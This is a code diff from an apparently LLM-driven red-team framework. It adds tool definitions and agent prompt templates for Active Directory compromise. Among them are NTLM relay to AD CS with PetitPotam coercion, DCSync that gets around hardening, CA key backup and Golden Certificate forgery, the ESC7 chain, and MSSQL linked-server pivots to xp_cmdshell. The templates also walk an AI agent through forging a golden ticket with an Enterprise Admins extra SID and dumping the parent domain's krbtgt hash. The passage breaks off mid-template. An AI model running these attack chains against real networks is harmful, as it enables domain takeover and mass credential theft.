— `auto_certipy_auth` will then PKINIT and extract the NT hash. Use this instead of orchestrating ntlmrelayx_to_adcs + petitpotam/coercer manually.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "ca_host": { + "type": "string", + "description": "AD CS server IP/hostname running the Certificate Authority web enrollment service (HTTP /certsrv)" + }, + "coerce_target": { + "type": "string", + "description": "Machine to coerce (NOT ca_host — must be a different host). Its machine account is what the relay will impersonate. Typically a DC's IP/hostname; in cross-forest scenarios any reachable machine in the target's RPC scope works." + }, + "attacker_ip": { + "type": "string", + "description": "Local listener IP that the coerced machine will authenticate to" + }, + "coerce_user": { + "type": "string", + "description": "Optional username for authenticated coercer fallback (only needed if unauth PetitPotam is patched; cross-forest: child user with RPC access)" + }, + "coerce_password": { + "type": "string", + "description": "Password for coerce_user (provide either coerce_password OR coerce_hash; only required if coerce_user is set)" + }, + "coerce_hash": { + "type": "string", + "description": "NT hash for coerce_user (provide either coerce_password OR coerce_hash; only required if coerce_user is set)" + }, + "coerce_domain": { + "type": "string", + "description": "Domain for coerce_user (the user's home realm, may differ from coerce_target's realm; only required if coerce_user is set)" + }, + "template": { + "type": "string", + "description": "Certificate template to request (default: DomainController)", + "default": "DomainController" + } + }, + "required": ["ca_host", "coerce_target", "attacker_ip"] + }), + }, ToolDefinition { name: "ntlmrelayx_multirelay".into(), description: "Relay captured NTLM authentication to multiple SMB targets simultaneously. Attempts to dump SAM database hashes from each target where the relayed account has local administrator privileges.".into(), diff --git a/ares-llm/src/tool_registry/credential_access/netexec_tools.rs b/ares-llm/src/tool_registry/credential_access/netexec_tools.rs index 977f1de4..27cf749d 100644 --- a/ares-llm/src/tool_registry/credential_access/netexec_tools.rs +++ b/ares-llm/src/tool_registry/credential_access/netexec_tools.rs @@ -101,6 +101,32 @@ pub fn definitions() -> Vec { "required": ["target", "domain"] }), }, + ToolDefinition { + name: "smb_login_check".into(), + description: "Validate a single credential against a target via SMB. Use this to verify that a credential works before attempting more complex attacks.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "Target IP address or hostname" + }, + "username": { + "type": "string", + "description": "Username to authenticate with" + }, + "password": { + "type": "string", + "description": "Password to authenticate with" + }, + "domain": { + "type": "string", + "description": "Target domain name" + } + }, + "required": ["target", "username", "password", "domain"] + }), + }, ToolDefinition { name: "gpp_password_finder".into(), description: "Search Group Policy Preferences for credentials (cpassword). Finds GPP XML files in SYSVOL containing encrypted passwords that can be trivially decrypted.".into(), diff --git a/ares-llm/src/tool_registry/credential_access/secretsdump.rs b/ares-llm/src/tool_registry/credential_access/secretsdump.rs index b89b45e8..2e7d754f 100644 --- a/ares-llm/src/tool_registry/credential_access/secretsdump.rs +++ b/ares-llm/src/tool_registry/credential_access/secretsdump.rs @@ -43,6 +43,14 @@ pub fn definitions() -> Vec { "type": "string", "description": "Path to Kerberos ccache ticket file for authentication" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening that blocks full dumps." + }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy extraction instead of DRSUAPI. Falls back when DRSUAPI is hardened." + }, "timeout_minutes": { "type": "integer", "description": "Overall operation timeout in minutes (default: 3)", diff --git a/ares-llm/src/tool_registry/lateral/execution.rs b/ares-llm/src/tool_registry/lateral/execution.rs index e8364d2c..56a94d47 100644 --- a/ares-llm/src/tool_registry/lateral/execution.rs +++ b/ares-llm/src/tool_registry/lateral/execution.rs @@ -416,6 +416,14 @@ pub fn definitions() -> Vec { "type": "string", "description": "Target IP address (if different from hostname resolution)" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening blocking full dumps." + }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy method instead of DRSUAPI replication. Falls back when DRSUAPI is restricted by domain hardening." + }, "timeout_minutes": { "type": "integer", "description": "Maximum time in minutes before aborting the dump", @@ -464,6 +472,14 @@ pub fn secretsdump_kerberos_definition() -> Vec { "type": "string", "description": "Target IP address (if different from hostname resolution)" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening blocking full dumps." + }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy method instead of DRSUAPI replication. Falls back when DRSUAPI is restricted by domain hardening." + }, "timeout_minutes": { "type": "integer", "description": "Maximum time in minutes before aborting the dump", diff --git a/ares-llm/src/tool_registry/lateral/mssql.rs b/ares-llm/src/tool_registry/lateral/mssql.rs index 0b32a043..e9e3b94d 100644 --- a/ares-llm/src/tool_registry/lateral/mssql.rs +++ b/ares-llm/src/tool_registry/lateral/mssql.rs @@ -194,8 +194,12 @@ pub fn definitions() -> Vec { }, ToolDefinition { name: "mssql_exec_linked".into(), - description: "Execute SQL queries on a linked MSSQL server via OPENQUERY. \ - Enables lateral movement through SQL Server linked server chains." + description: "Execute SQL queries on a linked MSSQL server via `EXEC ('...') AT \ + [link]` (RPC OUT). The hop runs as the connecting user's mapped credential, \ + which fails on cross-forest links without Kerberos delegation. For cross-forest \ + pivots: pass `impersonate_user='sa'` to wrap the hop in EXECUTE AS LOGIN \ + (uses the local SeImpersonate path), or use `mssql_openquery` to ride the \ + linked server's stored login mapping." .into(), input_schema: json!({ "type": "object", @@ -228,6 +232,58 @@ pub fn definitions() -> Vec { "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate before the hop (EXECUTE AS LOGIN). Use 'sa' to break out of double-hop limits when the local connection has IMPERSONATE on sa." + } + }, + "required": ["target", "username", "password", "linked_server", "query"] + }), + }, + ToolDefinition { + name: "mssql_openquery".into(), + description: "Query a linked MSSQL server via OPENQUERY using the linked server's \ + configured remote login (sp_addlinkedsrvlogin). Bypasses Kerberos double-hop \ + — use this when `mssql_exec_linked` fails on cross-forest links because the \ + connecting principal can't delegate, but the linked server has a stored \ + credential mapping (RPC OUT + sp_addlinkedsrvlogin)." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "MSSQL server IP or hostname (entry point)" + }, + "username": { + "type": "string", + "description": "Username for authentication" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "linked_server": { + "type": "string", + "description": "Name of the linked server to query" + }, + "query": { + "type": "string", + "description": "SQL query string passed inside OPENQUERY (single quotes auto-escaped)" + }, + "domain": { + "type": "string", + "description": "Domain name for Windows authentication" + }, + "windows_auth": { + "type": "boolean", + "description": "Use Windows authentication instead of SQL auth", + "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate before OPENQUERY (e.g. 'sa') for IMPERSONATE-based escalation." } }, "required": ["target", "username", "password", "linked_server", "query"] @@ -236,7 +292,8 @@ pub fn definitions() -> Vec { ToolDefinition { name: "mssql_linked_enable_xpcmdshell".into(), description: "Enable xp_cmdshell on a linked MSSQL server. Required before \ - executing OS commands on the linked server." + executing OS commands on the linked server. Pass `impersonate_user='sa'` \ + for cross-forest hops where the connecting principal lacks delegation." .into(), input_schema: json!({ "type": "object", @@ -265,6 +322,10 @@ pub fn definitions() -> Vec { "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate (EXECUTE AS LOGIN) before the hop." } }, "required": ["target", "username", "password", "linked_server"] @@ -273,7 +334,9 @@ pub fn definitions() -> Vec { ToolDefinition { name: "mssql_linked_xpcmdshell".into(), description: "Execute an OS command via xp_cmdshell on a linked MSSQL server. \ - Requires xp_cmdshell to be enabled on the linked server first." + Requires xp_cmdshell to be enabled on the linked server first. Pass \ + `impersonate_user='sa'` for cross-forest hops where the connecting \ + principal can't double-hop." .into(), input_schema: json!({ "type": "object", @@ -306,6 +369,10 @@ pub fn definitions() -> Vec { "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate (EXECUTE AS LOGIN) before the hop." } }, "required": ["target", "username", "password", "linked_server", "command"] diff --git a/ares-llm/src/tool_registry/mod.rs b/ares-llm/src/tool_registry/mod.rs index b2fa2573..fbcb3b08 100644 --- a/ares-llm/src/tool_registry/mod.rs +++ b/ares-llm/src/tool_registry/mod.rs @@ -560,6 +560,10 @@ mod tests { } } + // ----------------------------------------------------------------------- + // Blue team tool registry tests + // ----------------------------------------------------------------------- + #[cfg(feature = "blue")] mod blue_tests { use crate::tool_registry::blue::{ diff --git a/ares-llm/src/tool_registry/privesc/adcs.rs b/ares-llm/src/tool_registry/privesc/adcs.rs index 3f09edc1..f1476efd 100644 --- a/ares-llm/src/tool_registry/privesc/adcs.rs +++ b/ares-llm/src/tool_registry/privesc/adcs.rs @@ -10,7 +10,7 @@ pub fn definitions() -> Vec { name: "certipy_find".into(), description: "Find vulnerable certificate templates in Active Directory Certificate \ Services (AD CS). Enumerates CAs, templates, and identifies exploitable \ - misconfigurations (ESC1-ESC8)." + misconfigurations (ESC1-ESC15)." .into(), input_schema: json!({ "type": "object", @@ -31,13 +31,17 @@ pub fn definitions() -> Vec { "type": "string", "description": "Domain controller IP address" }, + "hashes": { + "type": "string", + "description": "NTLM hash for pass-the-hash (format: 'lmhash:nthash' or just ':nthash'). Use instead of password." + }, "vulnerable": { "type": "boolean", "description": "Only show vulnerable templates. Defaults to true.", "default": true } }, - "required": ["domain", "username", "password", "dc_ip"] + "required": ["domain", "username", "dc_ip"] }), }, ToolDefinition { @@ -77,6 +81,22 @@ pub fn definitions() -> Vec { "type": "string", "description": "User Principal Name to request the certificate for. Defaults to Administrator.", "default": "Administrator" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname to connect to for certificate enrollment. REQUIRED when the CA is on a different host than the DC (e.g. CA on a member server, DC on the domain controller). Without this, certipy tries RPC on the DC which fails with ept_s_not_registered." + }, + "sid": { + "type": "string", + "description": "Object SID to embed in the certificate (e.g. 'S-1-5-21-...-500' for Administrator). Required by certipy v5+ to prevent SID mismatch errors during certipy_auth. For Administrator, use the domain SID + '-500'." + }, + "out": { + "type": "string", + "description": "Output filename for the PFX certificate (without .pfx extension). A unique name is auto-generated if not specified. The resulting file will be .pfx — use this path for certipy_auth's pfx_path parameter." + }, + "application_policies": { + "type": "string", + "description": "Application policy OID to include in the certificate request. Used for ESC15 (CVE-2024-49019) exploitation where the template uses application policy OIDs for authorization." } }, "required": ["domain", "username", "password", "dc_ip", "ca", "template"] @@ -210,10 +230,207 @@ pub fn definitions() -> Vec { "type": "string", "description": "UPN of the target user to impersonate. Defaults to Administrator.", "default": "Administrator" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for certificate enrollment. REQUIRED when the CA is on a different host than the DC." } }, "required": ["domain", "username", "password", "dc_ip", "template", "ca"] }), }, + ToolDefinition { + name: "certipy_ca".into(), + description: + "Manage a Certificate Authority using Certipy. Can add yourself as a \ + CA officer (ManageCA right required), issue a pending certificate request, or \ + back up the CA's private key + certificate (requires SYSTEM/local admin on the \ + CA host — produces a PFX usable for offline certificate forgery via certipy_forge)." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication (must have ManageCA rights)" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "add_officer": { + "type": "boolean", + "description": "Add yourself as a CA officer. Requires ManageCA rights." + }, + "issue_request": { + "type": "integer", + "description": "Issue (approve) a pending certificate request by its request ID." + }, + "backup": { + "type": "boolean", + "description": "Back up the CA private key + certificate to a PFX. Requires SYSTEM or local admin on the CA host (use the credential of an account with that access). Output PFX is the input to certipy_forge for offline Golden Certificate forgery." + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca"] + }), + }, + ToolDefinition { + name: "certipy_forge".into(), + description: "Forge a certificate offline using a CA's backed-up private key (Golden \ + Certificate). Use after certipy_ca with backup=true to produce a PFX for any UPN \ + in the CA's domain — bypasses normal enrollment, no DC interaction. The forged \ + PFX feeds certipy_auth to obtain the target user's NT hash via PKINIT." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "ca_pfx": { + "type": "string", + "description": "Path to the CA's backed-up PFX file (produced by certipy_ca with backup=true)." + }, + "upn": { + "type": "string", + "description": "User Principal Name to forge the certificate for (e.g. 'administrator@contoso.local'). Used as the certificate subject for PKINIT authentication." + }, + "subject": { + "type": "string", + "description": "Optional certificate subject (Distinguished Name). Defaults to a sensible value derived from the UPN." + }, + "template": { + "type": "string", + "description": "Optional certificate template name to mimic. Defaults to a generic client-auth template." + }, + "out": { + "type": "string", + "description": "Output filename for the forged PFX. Auto-generated if omitted (forged__.pfx)." + } + }, + "required": ["ca_pfx", "upn"] + }), + }, + ToolDefinition { + name: "certipy_retrieve".into(), + description: "Retrieve a previously issued certificate from the CA by its request ID. \ + Used after certipy_ca -issue-request approves a pending request." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name" + }, + "request_id": { + "type": "integer", + "description": "The certificate request ID to retrieve" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for RPC enrollment" + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca", "request_id"] + }), + }, + ToolDefinition { + name: "certipy_relay".into(), + description: "Start a Certipy relay listener for ADCS certificate enrollment via \ + relay attacks. Supports HTTP relay (ESC8) and RPC relay (ESC11). \ + For ESC8: target=http://ca-host. For ESC11: target=rpc://ca-host." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "Relay target URL. Use 'http://' for ESC8 (HTTP web enrollment relay) or 'rpc://' for ESC11 (RPC certificate enrollment relay)." + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "template": { + "type": "string", + "description": "Certificate template to request during relay. Optional — defaults to Machine for HTTP or uses the CA's default." + } + }, + "required": ["target", "ca"] + }), + }, + ToolDefinition { + name: "certipy_esc7_full_chain".into(), + description: "Execute the full ESC7 exploit chain: add yourself as CA officer \ + (ManageCA abuse), request a SubCA certificate (gets denied), issue the pending \ + request, retrieve the certificate, and authenticate to obtain NT hashes. \ + Requires the user to have ManageCA rights on the target CA." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication (must have ManageCA rights)" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for certificate enrollment. REQUIRED when the CA is on a different host than the DC." + }, + "upn": { + "type": "string", + "description": "UPN of the user to impersonate. Defaults to 'administrator@'.", + "default": "administrator" + }, + "sid": { + "type": "string", + "description": "SID to embed in the certificate (e.g. domain SID + '-500' for Administrator)" + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca"] + }), + }, ] } diff --git a/ares-llm/src/tool_registry/privesc/tickets.rs b/ares-llm/src/tool_registry/privesc/tickets.rs index 47666a60..ccb6ff4f 100644 --- a/ares-llm/src/tool_registry/privesc/tickets.rs +++ b/ares-llm/src/tool_registry/privesc/tickets.rs @@ -64,10 +64,6 @@ pub fn definitions() -> Vec { "hash": { "type": "string", "description": "NTLM hash for pass-the-hash authentication (e.g. aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0). Use this OR password." - }, - "target_domain": { - "type": "string", - "description": "Parent domain FQDN (auto-detected from child if omitted)" } }, "required": ["child_domain", "username"] @@ -92,7 +88,11 @@ pub fn definitions() -> Vec { }, "password": { "type": "string", - "description": "Password for authentication" + "description": "Password for authentication (use this OR hash, must be non-empty)" + }, + "hash": { + "type": "string", + "description": "NTLM hash for pass-the-hash authentication (LM:NT or NT-only). Use this OR password." }, "dc_ip": { "type": "string", @@ -103,7 +103,7 @@ pub fn definitions() -> Vec { "description": "The trusted domain to extract the trust key for (e.g. fabrikam.local)" } }, - "required": ["domain", "username", "password", "dc_ip", "trusted_domain"] + "required": ["domain", "username", "dc_ip", "trusted_domain"] }), }, ToolDefinition { @@ -140,6 +140,14 @@ pub fn definitions() -> Vec { "description": "Username to embed in the ticket. Defaults to Administrator.", "default": "Administrator" }, + "extra_sid": { + "type": "string", + "description": "Extra SID to embed (e.g. '-519' for Enterprise Admins). Use for child-to-parent escalation within the same forest. OMIT for cross-forest trusts — SID filtering blocks RIDs < 1000." + }, + "aes_key": { + "type": "string", + "description": "AES256 trust key (hex, 64 chars). REQUIRED for Windows Server 2016+ target DCs — RC4-only inter-realm tickets are rejected with KDC_ERR_TGT_REVOKED. Extract alongside the NT hash via extract_trust_key (look for ':aes256-cts-hmac-sha1-96:' line)." + }, "duration": { "type": "integer", "description": "Ticket duration in days. Defaults to 3650.", diff --git a/ares-llm/src/tool_registry/recon.rs b/ares-llm/src/tool_registry/recon.rs index 3105f70b..e7b1f4cd 100644 --- a/ares-llm/src/tool_registry/recon.rs +++ b/ares-llm/src/tool_registry/recon.rs @@ -117,18 +117,22 @@ pub(super) fn tool_definitions() -> Vec { }, ToolDefinition { name: "ldap_search".into(), - description: "Execute an LDAP search query against a domain controller.".into(), + description: "Execute an LDAP search query against a domain controller. When authenticating with credentials from a different domain (e.g. child domain cred against parent DC), set bind_domain to the credential's domain.".into(), input_schema: json!({ "type": "object", "properties": { "target": {"type": "string", "description": "DC IP or hostname"}, - "domain": {"type": "string"}, + "domain": {"type": "string", "description": "Target domain (used for LDAP base DN)"}, "username": {"type": "string"}, "password": {"type": "string"}, "filter": {"type": "string", "description": "LDAP filter (e.g. '(objectClass=user)')"}, "attributes": { "type": "string", "description": "Comma-separated attributes to retrieve" + }, + "bind_domain": { + "type": "string", + "description": "Domain for LDAP bind DN (user@bind_domain). Use when credential domain differs from target domain (e.g. child-domain cred authenticating to parent DC). If omitted, uses 'domain'." } }, "required": ["target", "domain", "filter"] @@ -136,15 +140,16 @@ pub(super) fn tool_definitions() -> Vec { }, ToolDefinition { name: "rpcclient_command".into(), - description: "Execute an rpcclient command against a target.".into(), + description: "Execute an rpcclient command against a target. Supports pass-the-hash via the 'hash' parameter.".into(), input_schema: json!({ "type": "object", "properties": { "target": {"type": "string"}, - "command": {"type": "string", "description": "rpcclient command (e.g. 'enumdomusers')"}, + "command": {"type": "string", "description": "rpcclient command (e.g. 'enumdomusers', 'enumdomgroups', 'querygroupmem ')"}, "username": {"type": "string"}, "password": {"type": "string"}, - "domain": {"type": "string"} + "domain": {"type": "string"}, + "hash": {"type": "string", "description": "NTLM hash for pass-the-hash authentication (use instead of password)"} }, "required": ["target", "command"] }), @@ -256,5 +261,24 @@ pub(super) fn tool_definitions() -> Vec { "required": ["target"] }), }, + ToolDefinition { + name: "ldap_acl_enumeration".into(), + description: "Enumerate ACL attack paths by querying nTSecurityDescriptor attributes on AD objects. Identifies dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword, GenericWrite, WriteOwner, Self-Membership) that can be exploited for privilege escalation. Supports pass-the-hash via the 'hash' parameter.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": {"type": "string", "description": "DC IP or hostname"}, + "domain": {"type": "string", "description": "Target domain"}, + "username": {"type": "string"}, + "password": {"type": "string"}, + "hash": {"type": "string", "description": "NTLM hash for pass-the-hash (use instead of password)"}, + "bind_domain": { + "type": "string", + "description": "Domain for LDAP bind DN when credential domain differs from target domain" + } + }, + "required": ["target", "domain"] + }), + }, ] } diff --git a/ares-llm/templates/redteam/agents/coercion.md.tera b/ares-llm/templates/redteam/agents/coercion.md.tera index 887c6fbc..8036f9a3 100644 --- a/ares-llm/templates/redteam/agents/coercion.md.tera +++ b/ares-llm/templates/redteam/agents/coercion.md.tera @@ -111,12 +111,40 @@ dfscoerce( ## Relay Attack Coordination -### For ADCS ESC8 -You handle the full ESC8 attack chain: -1. Start `ntlmrelayx_to_adcs(ca_host="ca.contoso.local", attacker_ip="YOUR_IP")` -2. Run `petitpotam(target="dc.contoso.local", listener="YOUR_IP")` to coerce DC -3. DC authenticates to relay, relay requests certificate from CA -4. Certificate is saved, use `certipy_auth` (on privesc) to get NTLM hash +### For ADCS ESC8 — USE `relay_and_coerce` +**Preferred:** make ONE deterministic call — do not orchestrate ntlmrelayx + petitpotam manually. The composite tool starts the relay, runs **unauthenticated PetitPotam first** (works on unpatched DCs without any creds), then optionally falls back to **DFSCoerce (MS-DFSNM)**, then to coercer over MS-EFSR/MS-RPRN if creds are supplied. It emits a `certificate_obtained` vulnerability that triggers `certipy_auth` automatically. + +**CRITICAL — source ≠ target.** `coerce_target` MUST be a different host than `ca_host`. Windows NTLM same-machine loopback protection blocks relayed auth when the coerced machine is the relay target. Coerce a DC (or other reachable machine) and relay it to the CA. Coercing the CA back to itself is dead. + +**Default — unauth (try this FIRST, no creds needed):** +``` +relay_and_coerce( + ca_host="ca.contoso.local", # ADCS web enrollment host + coerce_target="dc01.contoso.local", # DIFFERENT host to coerce (not ca_host!) + attacker_ip="YOUR_IP", + template="DomainController" +) +``` + +**With creds (only add if unauth fails or DC is known patched):** +``` +relay_and_coerce( + ca_host="ca.contoso.local", + coerce_target="dc01.contoso.local", # MUST differ from ca_host + attacker_ip="YOUR_IP", + coerce_user="user", # Account to RPC the target machine + coerce_password="...", # OR coerce_hash=":NTHASH" + coerce_domain="user.realm", # User's home realm + template="DomainController" +) +``` +Cross-forest case: `coerce_user` lives in the child realm; `coerce_target` is the parent DC (or another parent-realm machine). The captured cert is for that machine's account — `certipy_auth` will PKINIT into the parent realm and extract the hash. **Try unauth first — most lab DCs are unpatched against PetitPotam.** + +**Fallback (only if `relay_and_coerce` is unavailable):** +1. `ntlmrelayx_to_adcs(ca_host=..., attacker_ip=...)` +2. `petitpotam(target=..., listener=...)` or `dfscoerce(...)` +3. Wait for cert capture +4. Manually report cert path so privesc can run `certipy_auth` ### For LDAP Relay ``` @@ -192,7 +220,8 @@ Combine mitm6 with ntlmrelayx to create computer account: |------|----------| | ntlmrelayx_to_smb | Relay to SMB for psexec/secretsdump | | ntlmrelayx_to_ldaps | Relay to LDAPS (RBCD, delegate-access) | -| ntlmrelayx_to_adcs | Relay to ADCS web enrollment (ESC8) | +| ntlmrelayx_to_adcs | Relay to ADCS web enrollment (ESC8) — prefer `relay_and_coerce` | +| relay_and_coerce | **Composite ESC8: starts relay + coerces DC + emits cert vuln in one call** | | ntlmrelayx_multirelay | Multi-target relay with targets file | ## Hash Types Captured diff --git a/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera b/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera index edc46b3c..3eecab13 100644 --- a/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera @@ -1,22 +1,44 @@ **ADCS {{ vuln_upper }} EXPLOITATION** CA Server: {{ ca_server }} -Template: {{ template }} +{% if ca_name %}CA Name: {{ ca_name }} +{% endif %}Template: {{ template }} Domain: {{ domain }} -Task ID: {{ task_id }} +{% if dc_ip %}DC IP: {{ dc_ip }} +{% endif %}{% if username %}Username: {{ username }} +{% endif %}{% if password %}Password: {{ password }} +{% endif %}{% if admin_sid %}Admin SID: {{ admin_sid }} +{% endif %}Task ID: {{ task_id }} -**STEP BUDGET: ~25 steps max. Work efficiently!** +{% if instructions %}**INSTRUCTIONS:** +{{ instructions }} + +{% endif %}**STEP BUDGET: ~25 steps max. Work efficiently!** **HARD LIMITS:** - 'connection refused'/'timed out' -> CA unreachable, STOP immediately - 'web enrollment' error -> HTTP not available, call task_complete(failed) - Max 2 attempts per tool, then report failure +{% if not is_esc8 -%} +**CRITICAL PARAMETERS for certipy_request:** +- `ca` = CA Name ({{ ca_name }}) — the CA identifier +- `target` = CA Server IP ({{ ca_server }}) — RPC enrollment connects here +- `dc_ip` = DC IP ({{ dc_ip }}) — LDAP queries only +- Do NOT confuse `target` (CA server) with `dc_ip` (domain controller) +{% if admin_sid %}- `sid` = {{ admin_sid }} — prevents SID mismatch in certipy_auth +{% endif %} +{% endif -%} + **WORKFLOW:** {% if is_esc8 -%} -1. Start ntlmrelayx targeting the CA's web enrollment -2. Coerce DC/target to authenticate to relay -3. Relay captures cert -> certipy_auth for hash +{% if coerce_target %}Coerce Target (primary): {{ coerce_target }} (must differ from CA Server — Windows loopback blocks same-host relay) +{% endif %}{% if coerce_targets and coerce_targets | length > 1 %}Fallback Coerce Targets (try in order if primary's callback drifts): {{ coerce_targets | join(sep=", ") }} +{% endif %}{% if listener_ip %}Relay Listener: {{ listener_ip }} +{% endif %}1. Start ntlmrelayx targeting the CA's web enrollment{% if listener_ip %} bound to {{ listener_ip }}{% endif %} +2. Coerce {% if coerce_target %}{{ coerce_target }}{% else %}a DC or other target host (NOT the CA){% endif %} to authenticate to the relay +3. If the relay log shows no inbound auth (callback drift) and a credential is available, retry with `coerce_user`/`coerce_password` parameters set so DFSCoerce/Coercer phases can authenticate{% if coerce_targets and coerce_targets | length > 1 %}; if still no callback, retry `relay_and_coerce` against the next host in the fallback list{% endif %} +4. Relay captures cert -> certipy_auth for hash {% else -%} 1. certipy_request to request certificate with alternate UPN 2. certipy_auth to get NTLM hash from certificate diff --git a/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera b/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera index 0c6bf068..4ddf9e4b 100644 --- a/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera @@ -58,6 +58,42 @@ mssql_enum_linked_servers( ) ``` -> Linked servers can pivot across domain/forest trusts! + +**STEP 6: PIVOT CROSS-FOREST (mssql_exec_linked DOUBLE-HOP CAVEAT)** +`mssql_exec_linked` runs `EXEC ('...') AT [link]` which uses the connecting +user's mapped credential — this **fails on cross-forest links** without +Kerberos delegation (the classic double-hop problem). Two source-side +workarounds, in order of preference: + +1. **OPENQUERY via stored login mapping** (`mssql_openquery`) — rides the + linked server's `sp_addlinkedsrvlogin` mapping and bypasses double-hop. + First check the link has `RPC OUT` and a stored credential: + ``` + mssql_command(target='{{ target }}', ..., + command="SELECT s.name, s.is_rpc_out_enabled, l.uses_self_credential, l.remote_name + FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id;") + ``` + Then pivot: + ``` + mssql_openquery(target='{{ target }}', ..., + linked_server='SQL02', + query='SELECT SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') + ``` + +2. **EXECUTE AS LOGIN locally, then hop** — when current login has + IMPERSONATE on a high-priv login (e.g. `sa`), wrap the hop: + ``` + mssql_exec_linked(target='{{ target }}', ..., + linked_server='SQL02', + impersonate_user='sa', + query='SELECT SYSTEM_USER') + ``` + Same `impersonate_user` parameter works on `mssql_linked_enable_xpcmdshell` + and `mssql_linked_xpcmdshell`. + +If the linked server reports `is_rpc_out_enabled=1` and a non-self stored +login mapping exists, use `mssql_openquery`. Otherwise, enumerate +IMPERSONATE first and chain via `impersonate_user='sa'`. {% if creds_section %} {{ creds_section }} {% endif -%} @@ -65,7 +101,8 @@ mssql_enum_linked_servers( - Try EACH credential above - SQL accepts Windows auth - Impersonation check is HIGHEST PRIORITY (fastest path to sysadmin) - If xp_cmdshell gives NETWORK SERVICE, you may need potato attack for SYSTEM -- Linked servers enable cross-domain pivoting +- Linked servers enable cross-domain pivoting — cross-forest links REQUIRE + `mssql_openquery` or `impersonate_user='sa'` (see STEP 6) Report credentials obtained in JSON format: ```json diff --git a/ares-llm/templates/redteam/tasks/exploit_trust.md.tera b/ares-llm/templates/redteam/tasks/exploit_trust.md.tera index c28c8402..bf56e1d5 100644 --- a/ares-llm/templates/redteam/tasks/exploit_trust.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_trust.md.tera @@ -5,16 +5,102 @@ Target Domain: {{ trusted_domain }} DC IP: {{ dc_ip }} Task ID: {{ task_id }} +{% if is_child_to_parent and has_child_krbtgt -%} +**INTRA-FOREST CHILD→PARENT — ExtraSid via child krbtgt** + +This is a parent-child intra-forest trust. SID filtering does NOT apply, so we +forge a golden ticket signed by the child krbtgt with the parent's Enterprise +Admins SID via `extra_sid`. **Do NOT call extract_trust_key, get_sid, or +create_inter_realm_ticket — those are not needed for this path.** + +**STEP 1: FORGE EXTRASID GOLDEN TICKET** +``` +generate_golden_ticket( + krbtgt_hash='{{ child_krbtgt_hash }}', + domain_sid='{{ source_sid_val }}', + domain='{{ domain }}', + extra_sid='{{ extra_sid_val }}-519' +) +``` +-> Saves `Administrator.ccache` in working directory + +**STEP 2: DCSync THE PARENT DC WITH THE TICKET** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + ticket_path='Administrator.ccache', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}' +) +``` +-> Success means parent krbtgt hash extracted = full DA on parent. + +**Fallback A — `-just-dc-user krbtgt` if 